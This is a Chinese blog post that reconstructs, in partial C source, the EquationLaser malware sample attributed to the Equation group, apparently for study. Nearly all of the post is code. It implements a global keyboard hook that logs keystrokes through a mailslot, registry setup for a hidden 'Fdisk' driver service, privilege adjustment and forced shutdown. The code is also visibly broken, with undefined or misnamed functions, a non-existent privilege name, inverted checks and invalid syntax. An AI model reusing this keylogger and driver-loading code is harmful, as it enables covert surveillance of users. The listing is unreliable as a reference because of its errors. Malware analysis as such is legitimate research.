EquationLaser_reversed_partial

最新推荐文章于 2021-11-23 17:39:41 发布
最新推荐文章于 2021-11-23 17:39:41 发布
阅读量202 收藏
点赞数
分类专栏: c/c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pureman_mega/article/details/88255961
版权

EquationLaser是方程式样本中的较早,从它的编程应用技巧的"古老"程度可以看出来,当然对于我这种编程经验比较欠缺的爱好者还是值得学习研究一下的.它会收集一些系统信息,键盘记录等。本来在资源里有个驱动文件,但是样本里的驱动已经释放出去,数据全为零,所以主要的功能应该还没分析到。

(仅供参考)

#include"stdafx.h"
#include<stdio.h>
#include<aclapi.h>
#include<process.h>
#include<winsock2.h>
#include<winuser.h>
#include<winnt.h>
#include<windows.h>

WORD MaxUdpDg=0;//word_100509c0
DWORD dword_69f84,dword_69f88,dword_1f74c,dword_1f750,dword_1f754,dword_6a010;
LONG Addend=0;
bool IsDeviceOpen=false,IsExitWinNeeded;
HANDLE hDevice=INVALID_HANDLE_VALUE,hHandle=INVALID_HANDLE_VALUE,hThread=INVALID_HANDLE_VALUE,hmod=INVALID_HANDLE_VALUE;
OSVERSIONINFOA Size;
HHOOK hhk[3];
char mailslot_name[0x30]="\\\\.\\mailslot\\__MS_1509_";
char Name[4076];
typedef bool(WINAPI *_OpenProcessToken)(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle);
typedef bool(WINAPI *_LookupPrivilegeValue)(LPCTSTR lpSystemBame,LPCTSTR lpName,PLUID lpLuid);
typedef bool(WINAPI *_AdjustTokenPrivileges)(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,
					DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength);
typedef DWORD(WINAPI *_SetSecurityInfo)(HANDLE handle,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,
								 PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl);
int version_info();
int OpenServiceManager();
void compute_seed(int *a,int *b,int *c);
void ShutdownPrivilege();
unsigned int _stdcall NewThread(LPVOID para);
LRESULT fn(int code,WPARAM wParam,LPARAM lParam);


BOOL APIENTRY DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
{
	switch(fdwReason)
	{
	case DLL_PROCESS_ATTACH://1
		{
			if(version_info()==0)
			{
				if(Addend==0)
				{
					hThread=(HANDLE)_beginthreadex(0,0x100000,&NewThread,0,0,0);
                    if(hThread!=NULL)
					{
						IsExitWinNeeded=false;
					}
					else
					{
						return true;
					}
				}
				hmod=hinstDLL;
				InterlockedIncrement(&Addend);
			}
			break;
		}
		/*
	case DLL_THREAD_ATTACH://2
		{
			break;
		}
	case DLL_THREAD_DETACH://3
		{
			break;
		}
		*/
	case DLL_PROCESS_DETACH://0
		{
			//
			if(version_info()==0)
			{
				InterlockedDecrement(&Addend);
				if(Addend==0)
				{
					//sub_1000f7fb
				}
				if(IsDeviceOpen!=false)
				{
					if(hDevice!=INVALID_HANDLE_VALUE)
					{
						CloseHandle(hDevice);
					}
					else
					{
						hDevice=NULL;
						IsDeviceOpen=false;
					}
				}
				ReleaseSemaphore(hHandle,7,0);
				Sleep(0xbb8);
				if(IsExitWinNeeded==false)
				{
					ShutdownPrivilege();
					ExitWindows(6,0);
				}
			}
			break;
		}
	}
	return TRUE;
}

int version()
{
	DWORD dwVersion=0;
	DWORD dwMajorVersion=0;
	DWORD dwMiniorVersion=0;
	DWORD dwBuild=0;

	dwVersion=GetVersion();
   // printf("dwVersion:%8x\n",dwVersion);
	//get windows version
	dwMajorVersion=(DWORD)(LOBYTE(LOWORD(dwVersion)));
	dwMiniorVersion=(DWORD)(HIBYTE(LOWORD(dwVersion)));
	dwBuild=(DWORD)(HIWORD(dwVersion));
    //printf("Version is %d.%d (%d)\n",dwMajorVersion,dwMiniorVersion,dwBuild);
	if(dwVersion<0x80000000)
	{
		if(dwMajorVersion==3)
		{
			if(dwMiniorVersion>=0x32)
			{
				return 0;
			}
			else
			{
				return 1;
			}
		}
		else
		{
			return 0;
		}
	}
	else
	{
		if(dwMajorVersion>=4)
		{
			return 0;
		}
		else
		{
			return 1;
		}
	}
}

unsigned int _stdcall NewThread(LPVOID para)
{
	//
	SetThreadPriority(GetCurrentThread(),0);
	SetErrorMode(0x8003);
    Size.dwOSVersionInfoSize=0x94;
	if(GetVersionExA(&Size)==1)
	{
		if(Size.dwOSVersionInfoSize==2)
		{
			dword_1f74c=1;
			if(Size.dwMajorVersion==5)
			{
		    	dword_1f750=1;
			}
		}
        else
		{
			if((Size.dwMajorVersion==4)&&(Size.dwMinorVersion==0x5a))
			{
				dword_1f754=1;
				dword_1f74c=1;
			}
			else
			{
				dword_1f754=0;
			}
		}
	}
    if(dword_1f74c==1)
	{
		if(OpenServiceManager()!=0)
		{
			return 0;
		}
	}
	/*


   */
	return 0;
}

int OpenServiceManager()
{
	SC_HANDLE sc_handle=INVALID_HANDLE_VALUE;
	sc_handle=OpenSCManagerA(0,0,0xf003f);
	if(sc_handle==INVALID_HANDLE_VALUE)
	{
		Sleep(0xea60);
		OpenServiceManager();
	}
	CloseServiceHandle(sc_handle);
	return 0;
}

void decode(char *string,int length)
{
	int num_to_shift=3,a=0x9ea6,b=0x4f53,c=0x7,temp=0,i=0;

	while(length)
	{
		compute_seed(&a,&b,&c);
		temp=(string[i])&7;
		string[i]=(a>>num_to_shift)^(string[i]);
		num_to_shift=temp;
		length--;
		i++;
	}
}

void compute_seed(int *a,int *b,int *c)
{
	int temp=0,v=0;
    v=temp=(8*(*a))|((*a)>>13);
    *a^=*b;
	*b=(*c)^(temp&(0xfff8));
	*c=v&7;
}

int GetRegkeyReady()
{
	char *Class;
	int finished=0;
	DWORD dwDisposition,data;
	HKEY hkResult;
	if(RegCreateKeyExA(HKEY_LOCAL_MACHINE/*0x80000002*/,"System\\CurrentControlSet\\Services\\Fdisk",0,Class,0,0x0f003f,
		0,&hkResult,&dwDisposition)==0)
	{
		data=1;
		if(RegSetValueEx(hkResult,"Type",0,4,&data,4)==0)
		{
			data=3;
			if(RegSetValueEx(hkResult,"Start",0,4,&data,4)==0)
			{
				data=0;
				if(RegSetValueEx(hkResult,"ErrorControl",0,4,&data,4)==0)
				{
					finished=1;
				}
			}
		}
		RegCloseKey(hkResult);
	}
	return finished;
}

bool load_driver_get_handle()
{
	/*
	1,get load driver privilege
	2,get address of NtLoadDriver(IN PUNICODE_STRING DriverServiceName)
	3,load driver by call NtLoadDriver(\Registry\Machine\System\CurrentControlSet\Services\Fdisk)
	*/
	hDevice=CreateFileA("\\.\fdisk0",0xc0000000,0,0,3,0x80,0);
	return hDevice==INVALID_HANDLE_VALUE?0:1;
}

bool device_io_control_2224d8()
{
	DWORD ByteReturned=0;
	if(Size.dwPlatformId==VER_PLATFORM_WIN32_NT)
	{
		if(hDevice!=INVALID_HANDLE_VALUE)
		{
			if(false==DeviceIoControl(hDevice,0x2224d8,0,0,0,0,&ByteReturned,0))
			{
				return false;
			}
		}
		else
		{
			return false;
		}
	}
}

DWORD get_hardware_info(DWORD address)//get some hardware information
{
	DWORD num1,num2,num3;
	/*
		mov dx,0cf8h
		in  eax,dx
		mov num2,eax
		mov ecx,address
		mov num1,0cf8h
		mov eax,ecx
		and al,0fch
		mov address,eax
		out dx,eax
		and ecx,3
		add ecx,0cfch
		mov address,ecx
		mov dx,address
		in  eax,dx
		mov num1,eax
		mov ecx,num2
		mov num2,0cf8h
		and ecx,0fffffffch
		mov address,ecx
		mov dx,num2
		mov eax,address
		out dx,eax
		;
		mov eax,num1
	*/
}


bool check_version()//VER_PLATFORM_WIN32_NT
{
	OSVERSIONINFOA version_info;
	version_info.dwOSVersionInfoSize=0x94;
	if(dword_69f84!=0)
	{
		if(0!=GetVersionExA(&version_info))
		{
			MessageBoxA(NULL,"Failed to get Windows version",NULL,NULL);
			exit(2);
		}
		else
		{
			if(VER_PLATFORM_WIN32_NT==version_info)
			{
				dword_69f84=1;
				dword_69f88=1;
			}
			else
			{
				dword_69f88=0;
			}
		}
	}
	return dword_69f88;
}


void ShutdownPrivilege()//SeLoadDriverPrivilege
{
	int ret=0;
	HMODULE hObject;
	HANDLE handle;
	LUID  l_luid={0};
	TOKEN_PRIVILEGES l_token_privilege={0};
    _OpenProcessToken l_OpenProcessToken;
	_LookupPrivilegeValue l_LookupPrivilegeValue;
	_AdjustTokenPrivileges l_AdjustTokenPrivileges;
	hObject=LoadLibrary("ADVAPI32.DLL");
	if(hObject!=NULL)
	{
		l_OpenProcessToken=(_OpenProcessToken)GetProcAddress(hObject,"OpenProcessToken");
		if(l_OpenProcessToken!=0)
		{
			l_LookupPrivilegeValue=(_LookupPrivilegeValue)GetProcAddress(hObject,"LookupPrivilegeValue");
			if(l_LookupPrivilegeValue!=0)
			{
				l_AdjustTokenPrivileges=(_AdjustTokenPrivileges)GetProcAddress(hObject,"AdjustTokenPrivileges");
				if(l_AdjustTokenPrivileges!=0)
				{
					if(l_OpenProcessToken(GetCurrentProcess(),0x28,&handle)==true)
					{
						if(l_LookupPrivilegeValue(0,"SeShutdownDriverPrivilege",&l_luid)==true)
						{
							l_token_privilege.Privileges->Luid.HighPart=l_luid.HighPart;
							l_token_privilege.Privileges->Luid.LowPart=l_luid.LowPart;
							l_token_privilege.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
                            l_token_privilege.PrivilegeCount=1;
							l_AdjustTokenPrivileges(handle,false,&l_token_privilege,0x10,0,0);
						   	//if(GetLastError()==0)
							//{
							//	if(handle!=NULL)
							//		CloseHandle(handle);
							//	FreeLibrary(hObject);
							//}
						}
					}
				}
			}
		}
	}
	if(handle!=NULL)
		CloseHandle(handle);
	if(hObject!=NULL)
		FreeLibrary(hObject);
}

int _WSAStartup(WORD wVersionRequested,char socket_num)
{
	WSAData wsaData;
	if(0!=WSAStartup(wVersionRequested,&wsaData))
	{
		return 1;
	}
	if(LOBYTE(wsaData.wVersion)<LOBYTE(wVersionRequested)||HIBYTE(wsaData.wVersion)<HIBYTE(wVersionRequested))
	{
		return 1;
	}
	else if(LOBYTE(wsaData.wVersion)!=LOBYTE(wVersionRequested)||(LOBYTE(wsaData.wVersion)==LOBYTE(wVersionRequested)&&HIBYTE(wsaData.wVersion)>=HIBYTE(wVersionRequested)))
	{
		if(wsaData.iMaxSockets<socket_num)
		{
			return 1;
		}
		MaxUdpDg=wsaData.iMaxUdpDg;
		return 0;
	}
}

int windows_hook(char *lpszDesktop,int hhook_num,int set_or_unset)
{
	int      ret=0;
	HWINSTA  hWinSta=NULL;
	HWINSTA  hWinSta0=NULL;
	HDESK    hDesktop=NULL;

	do
	{
		hWinSta=GetProcessWindowStation();
		if(hWinSta==NULL)
		{
			ret=0;
			break;
		}
		hDesktop=GetThreadDesktop(GetCurrentThreadId());
		if(hDesktop==NULL)
		{
			ret=0;
			break;
		}
		hWinSta0=OpenWindowStationA("winsta0",false,WINSTA_ALL_ACCESS);
		if(hWinSta0==NULL)
		{
			ret=0;
			break;
		}
		if(false==SetProcessWindowStation(hWinSta0))
		{
			ret=0;
			break;
		}
		lpszDesktop=OpenDesktopA(lpszDesktop,0,false,MAXIMUM_ALLOWED);
		if(lpszDesktop==NULL)
		{
			ret=0;
			break;
		}
		if(false==SetThreadDesktop(lpszDesktop))
		{
			ret=0;
			break;
		}
		if(set_or_unset==0)
		{
			unset_hook();
		}
		else
		{
			if(0==set_hook(hhook_num))
			{
				ret=0;
				break;
			}
		}
		if(0==SetProcessWindowStation(hWinSta)||0==SetThreadDesktop(hDesktop)||CloseWindowStation(hWinSta0))
		{
			ret=CloseDesktop(lpszDesktop)?1:0;
		}
	}while(0);
	return ret;
}

int set_hook(int hhook_num)//record key stroke
{
	HHOOK hook=NULL;
	Sleep(0);
	hook=SetWindowsHookExA(WH_KEYBOARD,(HOOKPROC)fn,hmod,0);
	InterlockedExchange(hhk+hhook_num,hook);
	return hhk[hhook_num]?1:0;
}

void unset_hook(int hhook_num)
{
	if(hhk[hhook_num]!=NULL)
	{
		Sleep(0);
		UnhookWindowsHookEx(hhk[hhook_num]);
		hhk[hhook_num]=NULL;
	}
}

LRESULT fn(int code,WPARAM wParam,LPARAM lParam)
{
	return record(hhk,code,wParam,lParam);
}

int record(HHOOK hhk,int code,WPARAM wParam,LPARAM lParam)
{
	HANDLE file=INVALID_HANDLE_VALUE;
	DWORD NumberOfBytesWritten=0;
	WORD buffer[3]={0};
	LONG result=0;

	result=CallnextHookEx(hhk,code,wParam,lParam);
	if(code==0)
	{
		if(dword_6a010!=0)
		{
			buffer[0]=GetCurrentProcessId();
			buffer[1]=wParam;
			buffer[2]=lParam;    //0X40000000       1                       3    
			file=CreateFile(Name,GENERIC_WRITE,FILE_SHARE_DELETE,null,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
			if(INVALID_HANDLE_VALUE==file)
			{
				dword_6a010=0;
			}
			if(true==WriteFile(file,buffer,8,&NumberOfBytesWritten,NULL))
			{
				CloseHandle(file);
				dword_6a010=1;
			}
		}
	}
	return result;
}

DWORD WINAPI do_read_mailslot(LPARAM lParam)
{
	char buffer[0x50];
	DWORD bytes_num=0,nNumberOfBytesToWrite;
	HANDLE hObject=INVALID_HANDLE_VALUE; 
	HANDLE hMailslot=INVALID_HANDLE_VALUE;//4
	HMODULE hModule=INVALID_HANDLE_VALUE;
	_SetSecurityInfo l_SetSecurityInfo=NULL;

	hObject=CreateFile((char *)lParam+0x2c0,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);
    if(INVALID_HANDLE_VALUE!=hObject)
	{
		bytes_num=SetFilePointer(hObject,0,NULL,FILE_END);
		if(bytes_num>*(DWORD *)((PVOID)lParam+0x2bc))
		{
			CloseHandle(hObject);
			Clean_hook_and_key(lParam);
			_endthreadex(1);
			return 0;
		}
		lstrcpynA(Name,mailslot_name,0x103);
		hMailslot=CreateMailslotA(Name,0,0,NULL);
		if(INVALID_HANDLE_VALUE==hMailslot)
		{
			CloseHandle(hObject);
			clean_hook_and_key(lParam);
			_endthreadex(1);
		}
		if(0!=dword_1f74c)
		{
			hModule=LoadLibraryA("advapi32.dll");
			if(hModule)
			{
				l_SetSecurityInfo=(_SetSecurityInfo)GetProcAddress(hModule,"SetSecurityInfo");
				if(NULL!=l_SetSecurityInfo)
				{                                        //6
					if(ERROR_SUCCESSW==l_SetSecurityInfo(hMailslot,SE_KERNEL_OBJECT,PROCESS_SET_SESSIONID,NULL,NULL,NULL,NULL))
					{
						nNumberOfBytesToWrite=0;
						dword_6a010=1;
						do
						{
							nNumberOfBytesToWrite=0x50;
							if(0!=read_mailslot(hMailslot,buffer,&nNumberOfBytesToWrite))
							{
								if(nNumberOfBytesToWrite>0)
								{
									if(true==WriteFile(hObject,buffer,nNumberOfBytesToWrite,NULL,NULL))
									{
										bytes_num+=nNumberOfBytesToWrite;
										if(nNumberOfBytesToWrite>=*(DWORD *)((char *)lParam+0x2bc))
										{
											dword_6a010=0;
										}
									}
								}
							}
							else
							{
								dword_6a010=0;
							}
							Sleep(0xfa);
						}while(dword_6a010);
						CloseHandle(hObject);
						CloseHandle(hMailslot);
						clean_hook_and_key(lParam);
						return 0;
					}
				}
			}
		}
	}
	else
	{
		Clean_hook_and_key(lParam);
		_endthreadex(1);
		return 0;
	}
}

bool check_root_drive_info(char lpRootPathName)
{
	DWORD   FileSystemFlags;
	DWORD   MaximumComponentLength;
	char    FileSystemNameBuffer[MAX_PATH];

	if(GetVolumeInformation(lpRootPathName,NULL,0,NULL,&MaximumComponentLength,&FileSystemFlags,MAX_PATH,FileSystemNameBuffer))
	{
		if(0==lstrcmpA(FileSystemNameBuffer,"NTFS")&&FileSystemFlags==FILE_PERSISTENT_ACLS)
		{
			/*
			FILE_PERSISTENT_ACLS,The specified volume preserves and enforces 
			access control lists(ACL).For example,the NTFS file system preserves 
			and enforces ACLs,and the FAT file system does not.
			*/
			return true;
		}
	}
	return false;
}

int select(DWORD optlen)
{
	fd_set   writefds;
	fd_set   exceptfds;
	char*    optval=NULL;
	timeval  timeout;

	writefds.fd_count=1;
	writefds.fd_array=sock;
	exceptfds.fd_count=1;
	exceptfds.fd_array=sock;

	if(optlen>0x3e8)
	{
		timeout.tv_usec=0;
		timeout.tv_sec=optlen/0x3e8;
	}
	else
	{
		timeout.tv_usec=0;
		timeout.tv_sec=0x3e8*optlen;
	}
	if(1=select(0,NULL,&writefds,&exceptfds,&timeout))
	{
		if(0==_WSAFDIsSet(sock,&exceptfds))
		{
			return _WSAFDIsSet(sock,&writefds)>0?1:0;
		}
	}
	else
	{
		optlen=4;
		return getsockopt(sock,SOL_SOCKET,SO_ERROR,(char*)&optval,&optlen)|0xff;
	}
}

void clean_hook_and_key(void* lparam)
{
	/*
	*/
}

 

pureman_mega
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
reversed python_python字典reversed
bobo的博客
12-28 823
Python reversed函数函数reversed不返回列表,而是返回一个迭代器。可使用list将返回的对象转换为列表。 x = [1,2,3] number = reversed(x)# error number = list(reversed(x))>> [3,2,1]清晨的粥比深夜的酒好喝,骗你的人比爱你的人会说。python:下面这个语句返回值为什么是False:真正的爱凌...
ROVNIX攻击平台分析 -利用WordPress平台传播的多插件攻击平台
weixin_34100227的博客
03-08 396
SwordLea · 2015/07/27 19:50微信公众号:Antiylab0x00 背景近期,安天安全研究与应急处理中心(安天CERT)的安全研究人员在跟踪分析HaveX家族样本的过程中,意外地发现了Rovnix家族(Trojan/Win32.Rovnix)在建立其恶意代码下载服务器时,也开始使用类似HaveX的方式,即:使用WordPress搭建的网站,或入侵第三方由WordPress搭...
CreateRemoteThread 失败错误码 5
vn700的专栏
06-08 5945
最近在WIN7下调试DLL注入进程的时候,32位的注入总是返回失败,错误码5。64位没问题。经过反复的检查。发现是OpenProcess打开的方式不对。添加PROCESS_ALL_ACCESS,问题解决。查了一下微软的文档,发现这个参数在XP下可能是有问题的。所以建议XP和WIN7分别处理。代码如下:BOOL InjectDll(TCHAR* ptszDllFile, DWORD dwProces
VC中利用多线程技术实现线程之间的通信
weixin_33725515的博客
03-10 297
  当前流行的Windows操作系统能同时运行几个程序(独立运行的程序又称之为进程),对于同一个程序,它又可以分成若干个独立的执行流,我们称之为线程,线程提供了多任务处理的能力。用进程和线程的观点来研究软件是当今普遍采用的方法,进程和线程的概念的出现,对提高软件的并行性有着重要的意义。现在的大型应用软件无一不是多线程多任务处理,单线程的软件是不可想象的。因此掌握多线程多任务设计方法对每个程序员都是...
UNITY_REVERSED_Z
小孔明的专栏
03-15 3107
HLSLSupport.cginc #if defined(SHADER_API_D3D11) || defined(SHADER_API_PSSL) || defined(SHADER_API_XBOXONE) || defined(SHADER_API_METAL) || defined(SHADER_API_VULKAN) || defined(SHADER_API_SWITCH) // D...
python字符串函数reversed_Python reversed()函数
weixin_29497981的博客
01-13 863
# Python `reversed()`函数> 原文: [https://thepythonguru.com/python-builtin-functions/reversed/](https://thepythonguru.com/python-builtin-functions/reversed/)* * *于 2020 年 1 月 7 日更新* * *`reversed()`函数允许...
python内置函数reversed_Python3内置函数——reversed() = 翻转我的世界
weixin_33154775的博客
03-02 1282
v. 颠倒(reverse的过去式和过去分词);翻转help(reversed)Help on class reversed in module builtins:class reversed(object)| reversed(sequence) -> reverse iterator over values of the sequence|| Return a reverse ite...
python - dict.__reversed__() 无效吗?
jhsxy2005的博客
06-25 548
之前list使用list.reversed(),他返回一个指针,可以for i in list.reversed():i 也可以b=list(list.reversed())。 但是dict.reversed(),都无效。 In [8]: aa Out[8]: {1: 2, 3: 4} In [9]: reversed(aa) Out[9]: <dict_reversekeyiterator at 0x21735f61db0> In [10]: aa.__reversed__() Out[1
Nike_Reversed:入侵 Nike Fuelband
06-19
Nike_Reversed
UID_CP_WriteID_Reversed.cpp
09-28
UID_CP_WriteID_Reversed.cpp
time_reversed.rar_matlab 时间反转_matlab时间反转_时间反转_时间反转算法_时间反转镜
07-15
在IT领域,尤其是在信号处理和通信工程中,时间反转(Time Reversal)是一种重要的技术。这个技术基于物理现象,即当一个声波或电磁波在特定介质中传播时,如果将其时间反向,它会沿着原来的路径返回到发射源。...
worcp_reversed:进行少量反向工程以对WOR控制面板进行反向工程
04-12
在这个特定的项目“worcp_reversed”中,目标是研究和理解名为“WOR控制面板”的软件,可能是为了调试、安全分析、兼容性改进或者其他合法目的。 这个项目的重点在于使用C#语言进行反向工程。C#是一种常用的面向...
reversed_js13k
05-10
"reversed_js13k" 是一个基于JavaScript的游戏项目,参与了2015年的JS13K比赛。JS13K是一个每年举办的在线编程竞赛,挑战开发者在13 kilobytes(KB)的限制内创建完整的游戏。该比赛旨在展示JavaScript在资源有限的...
修改硬盘固件的木马 探索方程式(EQUATION)组织的攻击组件
betteroneisme的专栏
05-09 2591
安天实验室 报告下载 首次发布时间:2015年03月05日 10时00分  本版本更新时间:2015年03月05日 09时45分 目 录 1       背景 2       Equation组织使用的组件 3       组件DoubleFantasy分析 3.1        检测安全软件 3.2        回传信息 3.3     
Practical Malware Analysis Lab9
40KO的博客
03-15 597
Lab9-1 不走程序直接逆。标注完的主函数如下 int __cdecl main(int argc, const char **argv, const char **envp) { char port; // [sp+10h] [bp-181Ch]@31 char ups; // [sp+410h] [bp-141Ch]@31 char url; // [sp+810h] [b...
通过遍历系统句柄信息(SystemHandleInformation),获取系统进程和当前进程的eprocess
热门推荐
pureman_mega的博客
11-23 1万+
实验环境:win10 1909 64 参考:https://blog.csdn.net/qinlicang/article/details/4489727 首先,获取系统的句柄信息;然后,在句柄信息表中进行搜索,通过数据结构进行匹配;最后,确定系统进程和当前进程的eprocess; 主要数据结构如下: typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBack
为什么用指针?(20230228更新函数指针使用)
pureman_mega的博客
03-14 5242
相信接触过编程的,大部分应该对C语言有一定了解或者学过一门C语言课程。或多或少听到这种说法:C语言很难学,特别是指针。我大一下学期开的这门课,学完之后感觉还好(其实是我没有深入学,典型的自我感觉良好: )),但指针那块确实也没太弄明白。现在好像明白了一点什么是指针,在什么情况下用比较好。 int a=1;//int* pointer_a=1 在编译会报错 // 'initializing':can
__reversed__
最新发布
07-12
`__reversed__` 是 Python 中的一个特殊方法,用于定义自定义对象的反向迭代行为。当一个类定义了 `__reversed__` 方法时,它可以通过 `reversed()` 函数或使用 `for` 循环的反向迭代来获取对象的反向迭代器。 下面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值